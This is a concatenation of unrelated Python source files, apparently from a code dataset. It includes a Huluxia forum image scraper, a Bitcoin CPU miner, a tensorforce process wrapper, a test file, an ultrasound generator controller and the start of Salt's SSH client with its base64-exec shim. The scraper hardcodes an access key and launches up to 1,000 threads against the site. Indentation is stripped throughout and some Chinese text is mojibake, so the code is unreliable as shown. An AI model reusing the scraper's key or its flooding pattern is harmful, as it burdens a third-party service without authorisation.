# pool.map(pf.rotate_pdf, subset_list_pdf_full)
pool.map(pf.pickle_pdf_xml, args)
pool.close()
# timing ends and the delta is displayed
print('That took {} seconds'.format(time.time() - starttime))
with multiprocessing.Pool() as pool:
outputs = pool.map(mf.extract_tables_noname, args)
|
environment_process_wrapper.py
|
from tensorforce.environments import Environment
from multiprocessing import Process
from multiprocessing import Pipe
def worker(environment, conn2):
while True:
# Receive the environment method's name, and (optional) arguments
(name, *args, kwargs) = conn2.recv()
attr = object.__getattribute__(environment, name)
if hasattr(attr, '__call__'):
# Get what is returned by the method
result = attr(*args, **kwargs)
else:
# Get the attribute
result = attr
# Send this to the Wrapper
conn2.send(result)
class ProcessWrapper(Environment):
def __init__(self, environment):
super(ProcessWrapper, self).__init__()
# Instantiate a bidirectional Pipe
self.conn1, conn2 = Pipe(duplex=True)
# Start the worker process, which interacts directly with the environment
self.p = Process(target=worker, args=(environment, conn2))
self.p.start()
# To call a custom method of your environment
def __getattr__(self, name):
def wrapper(*args, **kwargs):
return self.send_environment(name, *args, **kwargs)
return wrapper
def send_environment(self, name, *args, **kwargs):
"""Send a request through the pipe, and wait for the answer message.
"""
to_send = (name, *args, kwargs)
# Send request
self.conn1.send(to_send)
# Wait for the result
result = self.conn1.recv()
return result
def close(self, *args, **kwargs):
# Close the wrapped environment first; the worker loops forever on recv(), so terminate it.
result = self.send_environment('close', *args, **kwargs)
self.p.terminate()
self.p.join()
return result
def states(self, *args, **kwargs):
return self.send_environment('states', *args, **kwargs)
def actions(self, *args, **kwargs):
return self.send_environment('actions', *args, **kwargs)
def reset(self, *args, **kwargs):
return self.send_environment('reset', *args, **kwargs)
def execute(self, actions, *args, **kwargs):
return self.send_environment('execute', actions, *args, **kwargs)
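# Illustrative usage sketch (MyEnvironment is a hypothetical tensorforce Environment
# subclass, not part of this file): every call below is forwarded to the worker
# process through the pipe by __getattr__/send_environment.
#
# env = ProcessWrapper(MyEnvironment())
# print(env.states())                  # proxied via send_environment()
# state = env.reset()
# result = env.execute(actions=0)      # returns whatever the wrapped env returns
# env.close()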
|
huluxiaThirdflood_api.py
|
#!/usr/bin/python3
# encoding: utf-8
"""
@author: m1n9yu3
@license: (C) Copyright 2021-2023, Node Supply Chain Manager Corporation Limited.
@file: huluxiaThirdflood_api.py
@time: 2021/4/26 19:03
@desc:
"""
import os
import requests
import time
import json
import threading
from urllib import parse
# file helpers
def mkdir_(path):
if not os.path.isdir(path):
os.mkdir(path)
def remove_(path):
if os.path.isfile(path):
os.remove(path)
def save_text(path, context):
"""ไฟๅญ txt ๆๆกฃ"""
with open(path, "a") as f:
f.write(str(context))
# data fetching helpers
# crawl through a proxy ip (optional)
# proxies = {"http": "127.0.0.1:8889"}
proxies = {}
def get_json(url):
return requests.get(url, proxies=proxies).json()
def download_img(path, data, flag):
"""ๅพ็ไธ่ฝฝ ่ฏ่ฎบไธญๅพ็ๅไธปๅพๅพ็
:param flag:
"""
def download_signed_img(url):
""" ๅไธชๅพ็ไธ่ฝฝ"""
# print(urls)
url = url.replace(" ", "") # ๆฟๆข็ฉบๆ ผ
img_name = path + url.split("/")[-1]
if img_name.split('.')[-1] == 'ht':
img_name += '.png'
with open(img_name, 'wb') as f:
f.write(requests.get(url, proxies=proxies).content)
# print("็ฌๅๅฎๆ:", url)
if flag != 0:
return data
for i in data:
download_signed_img(i)
def download_video(path, url):
"""่ง้ขไธ่ฝฝ"""
return
response = requests.get(url)
with open(path, "wb") as f:
f.write(response.content)
def download_json_image(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
print(post_id, "ๅผๅง็ฌๅ")
page_num = 1
js_dir = ''
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
# debug output
# print(url.format(post_id, page_num))
# print(js)
if js['msg'] == '话题不存在' or js['msg'] == '话题所属分类不存在':
return
# stop when there are no more comment pages
if page_num > 1:
if not js['comments']:
break
# start saving the image data
if page_num == 1:
# create the output directories
if flag != '':
js_dir = flag
mkdir_(js_dir)
else:
js_dir = './{}/'.format(js['post']['category']['title'])
mkdir_(js_dir)  # board/category directory (first level)
js_dir += '{}/'.format(post_id)
mkdir_(js_dir)  # post_id directory (second level)
# collect the main images of the post
download_img(js_dir, js['post']['images'], 0)
txt_name = js_dir + "说明.txt"
# collect and save the post title and body text
save_text(txt_name, js['post']['title'] + '\n' + js['post']['detail'])
# if the post has a video, download it
if js['post']['voice'] != "":
d = json.loads(js['post']['voice'])
download_video(js_dir + d['videofid'].split('/')[-1] + '.mp4', d['videohost'] + d['videofid'])
# save the raw json data of each post
save_text(js_dir + "js.txt", js)
# collect the images from the comments
for i in js['comments']:
download_img(js_dir, i['images'], 0)
# comment text is not collected
page_num += 1
print(post_id, "็ฌๅ็ปๆ")
return
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return
def parse_json(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
print(post_id, "ๅผๅง็ฌๅ")
page_num = 1
js_dir = ''
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
# debug output
# print(url.format(post_id, page_num))
# print(js)
if js['msg'] == '话题不存在' or js['msg'] == '话题所属分类不存在':
return
# stop when there are no more comment pages
if page_num > 1:
if not js['comments']:
break
# start saving the image data
if page_num == 1:
# collect the main images of the post
download_img(js_dir, js['post']['images'], 0)
# (the post text is not saved in this variant)
# if the post has a video, download it
if js['post']['voice'] != "":
d = json.loads(js['post']['voice'])
download_video(js_dir + d['videofid'].split('/')[-1] + '.mp4', d['videohost'] + d['videofid'])
# collect the images from the comments
for i in js['comments']:
download_img(js_dir, i['images'], 0)
page_num += 1
print(post_id, "็ฌๅ็ปๆ")
return
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return
def get_images_url(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
page_num = 1
js_dir = ''
image_url_list = []
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
if js['msg'] == '话题不存在' or js['msg'] == '话题所属分类不存在':
return []
# stop when there are no more comment pages
if page_num > 1:
if not js['comments']:
break
# start collecting image urls
if page_num == 1:
# urls of the main images of the post
image_url_list += download_img(js_dir, js['post']['images'], 1)
# urls of the images in the comments
for i in js['comments']:
image_url_list += download_img(js_dir, i['images'], 1)
# comment text is not collected
page_num += 1
return image_url_list
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return []
def set_proxy(proxy: dict):
"""็จไบ่ฎพ็ฝฎไปฃ็"""
global proxies
proxies = proxy
def multi_thread(idlist, path):
"""็บฟ็จๆงๅถ ๏ผ ไธๆฌก่ท 1000 ไธช็บฟ็จ"""
# for i in range(start_id, step+start_id):
# parse_json(url, start_id+i)
threads = []
for i in idlist:
threads.append(threading.Thread(target=get_images_url, args=(i, path)))
for i in threads:
i.start()
for i in threads:
i.join()
def ask_url(url, path, number=10):
i = 0
post_ids = []
js = get_json(url.format(i))
while True:
# exit when there are no more posts
if not js['posts']:
break
for post_id_i in js['posts']:
post_ids.append(post_id_i['postID'])
i += 1
# limit the number of pages crawled
# print(post_ids)
number -= 1
if number % 10 == 0:
multi_thread(idlist=post_ids, path=path)
if number == 0:
break
post_ids = []
js = get_json(url.format(js['start']))
print("็ฌๅๅฎๆ, ๅ
ฑ{} ไธชๅธๅญ".format(i))
def search_key(keyword):
# a sample _key: 074A517999865CB0A3DC24034F244DEB1E23E1512BA28A8D07315737041A1E393A13114A41B9FCE24CBD95E0AF7E0C72DC99A8E24218CC70
# _key = input("Enter _key: ")
_key = "074A517999865CB0A3DC24034F244DEB1E23E1512BA28A8D07315737041A1E393A13114A41B9FCE24CBD95E0AF7E0C72DC99A8E24218CC70"
url = "http://floor.huluxia.com/post/search/ANDROID/2.1?platform=2&market_id=tool_baidu&_key" \
"=%s&start=1&count=20&cat_id=56&keyword=%s&flag=0" % (_key, parse.quote(keyword))
# print(url)
ask_url(url, 'search_result/')
def get_random_imageurl(num:int) -> list:
url = "http://floor.huluxia.com/post/list/ANDROID/2.1?platform=2&market_id=tool_baidu&start={}&count=20&cat_id=56&tag_id=0&sort_by=0"
i = 0
number = num
image_url_list = []
js = get_json(url.format(i))
if not js['posts']:
return []
post_list = js['posts']
while True:
# refill the post list when the current batch has been used up
if len(post_list) == 0:
js = get_json(url.format(js['start']))
if not js['posts']:
break
post_list = js['posts']
i = 0
image_url_list += get_images_url(post_list[i]['postID'])
i += 1
# limit the number of pages crawled
number -= 1
if len(image_url_list) >= num:
break
# print(image_url_list)
# print("็ฌๅๅฎๆ, ๅ
ฑ{} ไธชๅธๅญ".format(i))
return image_url_list
'''
target:
http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={post_id}&page_no={page_no}
post ids increase sequentially
'''
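# Illustrative sketch (not part of the original script): build the detail URL shown
# above for an arbitrary example post id and fetch the first page with get_json().
#
# detail_url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
# js = get_json(detail_url.format(23333, 1))  # 23333 is a made-up example id
# print(js['post']['title'] if 'post' in js else js['msg'])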
def section_multi_thread(start_id, step):
"""็บฟ็จๆงๅถ ๏ผ ไธๆฌก่ท 1000 ไธช็บฟ็จ"""
# for i in range(start_id, step+start_id):
# parse_json(url, start_id+i)
threads = []
for i in range(step):
threads.append(threading.Thread(target=download_json_image, args=(start_id + i,)))
for i in threads:
i.start()
for i in threads:
i.join()
def section_get():
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
# collect the initial parameters
section = input("Enter a range: start-end (start >= 1, end > start) ")
start = int(section.split('-')[0])
end = int(section.split('-')[1])
thread_num = int(input("Enter the number of threads: "))
# start crawling
step = 1000  # default number of threads per batch
for i in range(start, end, thread_num):
# parse_json(url, i)
# next batch of targets; use multiple threads
section_multi_thread(i, thread_num)
# crawl log: as of 2021-01-13 08:00, reached post_id 24000
def get_leg():
"""่ทๅ็พ่
ฟๅพ็"""
path = input("่ฏท่พๅ
ฅ็ฌๅ่ทฏๅพ๏ผไป
ๆฏๆๅทฒๅญๅจ็็ฎๅฝ๏ผๆ่
ๅ็บง็ฎๅฝ:")
try:
page_num = int(input("่ฏท่พๅ
ฅ้กตๆฐ,้กตๆฐ่ถๅคง๏ผ็ฌ็่ถๆ
ข:"))
except ValueError:
page_num = 5
url = "http://floor.huluxia.com/post/list/ANDROID/2.1?platform=2&market_id=tool_baidu&start={}&count=20&cat_id=56&tag_id=0&sort_by=0"
if path[-1] != '/':
path += '/'
ask_url(url, path, page_num)
def get_post_id():
post_id = int(input("Enter a post id: "))
path = input("Enter a directory (enter q to save to the default directory): ")
if path == 'q':
download_json_image(post_id, './img/')
else:
download_json_image(post_id, './{}/'.format(path))
def menu():
"""Main menu: gathers all the features into a single menu."""
# clear the log of errors from previous runs
remove_("log.txt")
# start with no proxy configured (option 5 can set one)
set_proxy(None)
while True:
print("------ Menu -------")
print("1. Crawl a range of post ids")
print("2. Download leg pictures")
print("3. Crawl by keyword")
print("4. Download the post for a given post_id")
print("5. Set a proxy")
print("q. Quit")
flag = input("Enter your choice: ")
if flag == '1':
section_get()
elif flag == '2':
get_leg()
elif flag == '3':
keyword = input("Enter a keyword: ")
search_key(keyword)
elif flag == '4':
get_post_id()
elif flag == '5':
http_ip = input("Enter a proxy as ip:port ")
set_proxy({"http": http_ip})
elif flag == 'q':
break
if __name__ == '__main__':
pass
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
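# Illustrative sketch of the double-SHA256 / target test performed above
# (Python 2, reusing bufreverse/wordreverse; not part of the original miner):
#
# header = '\x00' * 80
# h = hashlib.sha256(hashlib.sha256(header).digest()).digest()
# value = long(wordreverse(bufreverse(h)).encode('hex'), 16)
# meets_target = value < target   # same proof-of-work comparison as in work()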
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 1337
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
pesapi_test.py
|
import sys
sys.path.append('..')
import unittest
import threading
import socket
import logging
import settings
from pprint import pprint
from interfaces import pesapi
from tornado import ioloop
class APITestCase(unittest.TestCase):
def setUp(self):
self.api = pesapi.PESAPIInterface(settings.pes_api_base_url,
settings.pes_api_userid,
settings.pes_api_privatekey)
def tearDown(self):
pass
class CreateMatchTestCase(APITestCase):
pass
class CreateReportTestCase(APITestCase):
def test_report(self):
offender = 76561197960265728L
victim = 76561197960265728L
reason = "CHEATING"
match_id = 1
self.api.create_report(offender, victim, reason, match_id,
callback = lambda d: pprint(d))
def test_suites():
classes = [ CreateMatchTestCase, CreateReportTestCase ]
return [ unittest.TestLoader().loadTestsFromTestCase(x) for x in classes ]
if __name__ == "__main__":
unittest.TestSuite(test_suites())
# get a tornado ioloop instance running in another thread so we can
# actually test this shiz
t = threading.Thread(target = unittest.main)
t.start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
quit()
|
FUS_Helper.py
|
import threading
import warnings
import util.io as io
import traceback
import sdk.pga as FUS
import multiprocessing
import os
#TODO: Actually record this information somewhere as a log
# class Listener(FUS.FUSListener):
# def onConnect(self):
# print("*** CONNECTED ***")
# def onDisconnect(self, reason):
# print("*** DISCONNECTED *** (reason=%d)" % reason)
# def onExecStart (self, execID, mode):
# print("*** EXEC START *** (id=%d, mode=%d)" % (execID, mode))
# def onShotResult (self, execID, shot_result):
# print("*** SHOT RESULT (id=%d) ***" % execID)
# def onExecResult (self, exec_result):
# print("*** EXEC RESULT ***")
class FUS_GEN():
def __init__(self, all_msgs, motor=None, host=None):
"""Initializes connection the IGT FUS Generator and sets up data structures
for setting up trajectories
Parameters
----------
host : string
Host IP address of the IGT FUS generator
port : int
Port of the IGT FUS Generator
timeout_ms: int
Number of ms to wait before timing out the connection
"""
self.igt_system = FUS.Generator()#loglevel=FUS.LogLevel.ALL
self.igt_system.loadConfig("sdk/generator.json")
self.motor = motor
self.all_msgs = all_msgs
self.run_thread = None
self.num_execs = None
self.host=host
self.running = False
self.connected = False
self.events = []  # timers scheduled by add_finish()
def connect(self):
try:
if self.igt_system.autoConnect():
self.all_msgs.appendMsg("Connected to IGT System!")
self.igt_system.enableAmplifier(True)
self.igt_system.selectOutput(FUS.Output.EXTERNAL)
self.connected = True
else:
self.all_msgs.appendMsg('Could not connect to IGT System. Check if system is plugged in?')
except Exception as err:
print('ERROR: ' + str(err))
io.line_print(traceback.format_exc())
self.all_msgs.appendMsg('Could not connect to IGT System. Check if system is plugged in?')
def send_traj(self,seq_data):
if self.motor is None or not self.motor.connected:
self.all_msgs.appendMsg('No motor system connected. Movement will be disabled.')
else:
self.use_motor = True
self.trajectory = []
self.motor_traj = []
for pulse in seq_data["Sequence"]:
self.trajectory.append(FUS.Pulse(
dura = int(pulse["Duration"]*1000.0), #Duration in microseconds
dela = int(pulse["Delay"]*1000.0), #Delay in microseconds
ampl = int(pulse["Amplitude"]/100.0 * 1023), #Amplitude in [0,1023]
freq = int(pulse["Freq"]*1.0e6) #US Frequency in Hz
))
self.motor_traj.append((pulse["MoveX"], pulse["MoveY"], pulse["MoveZ"]))
self.num_execs = seq_data["ExecutionCount"]
self.seq_delay = int(seq_data["SequenceDelay"]*1000.0)
self.num_pulses = self.num_execs * len(self.trajectory)
#Schedule the FUS Firing
self.run_thread = multiprocessing.Process(target = self.execute_traj)
self.all_msgs.appendMsg("Sequence successfully sent.")
def run(self):
"""Starts the FUS execution queue
"""
if self.running:
self.all_msgs.appendMsg("ERROR: Experiment is already running!")
return
if not self.connected:
self.all_msgs.appendMsg("ERROR: Generator is not connected!")
return
# Start the execution
self.run_thread.start()
self.running = True
def close(self):
"""Disconnects the IGT System
"""
if self.connected:
self.igt_system.enableAmplifier(False)
self.igt_system.disconnect()
self.connected = False
self.all_msgs.appendMsg("Generator shutdown successfully.")
else:
self.all_msgs.appendMsg("Generator is already shutdown!")
def stop(self):
"""Stops the experiment
"""
if not self.running:
warnings.warn('<FUS_GEN> Experiment is already stopped')
return
self.running = False
self.igt_system.stopSequence()
self.run_thread.terminate()
self.run_thread.join()
self.run_thread = None
self.all_msgs.appendMsg('Sequence aborted at ' + io.get_time_string())
def add_finish(self,start_time):
"""Schedules when to stop the experiment (at the same time as the RPi)
Parameters
----------
start_time : float
Number of seconds when to stop the experiment
"""
self.events.append(threading.Timer(start_time,self.stop))
def reconnect(self):
"""Reconnects the IGT System
"""
if self.connected:
warnings.warn('<FUS_GEN> System is already connected',RuntimeWarning)
return
else:
if self.igt_system.autoConnect():
print("Connected to IGT System ", self.host)
else:
raise EnvironmentError('<FUS_GEN> Could not connect to IGT System')
def execute_traj(self):
"""Tells the IGT system to execute the current trajectory and then loads the next trajectory if necessary
into the Generator's buffers
Parameters
----------
traj_id : int
Index of the trajectory to be executed
"""
exec_flags = FUS.ExecFlag.ASYNC_PULSE_RESULT
self.igt_system.executeSequence(self.num_execs,self.seq_delay,exec_flags)
for i in range(self.num_pulses):
if not self.running:
break
measure = self.igt_system.readAsyncPulse()
#Issue Move command if motor is connected
if self.motor and self.motor.connected:
self.motor.moveRel(self.motor_traj[i % len(self.motor_traj)])
#Print Result of the FUS Shot
self.all_msgs.appendMsg('FUS RESULT: ' + str(measure))
self.running = False
self.all_msgs.appendMsg('Sequence finished at ' + io.get_time_string())
|
__init__.py
|
"""
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.fileclient
import salt.loader
import salt.log
import salt.minion
import salt.output
import salt.payload
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossible to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 /usr/libexec/platform-python python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
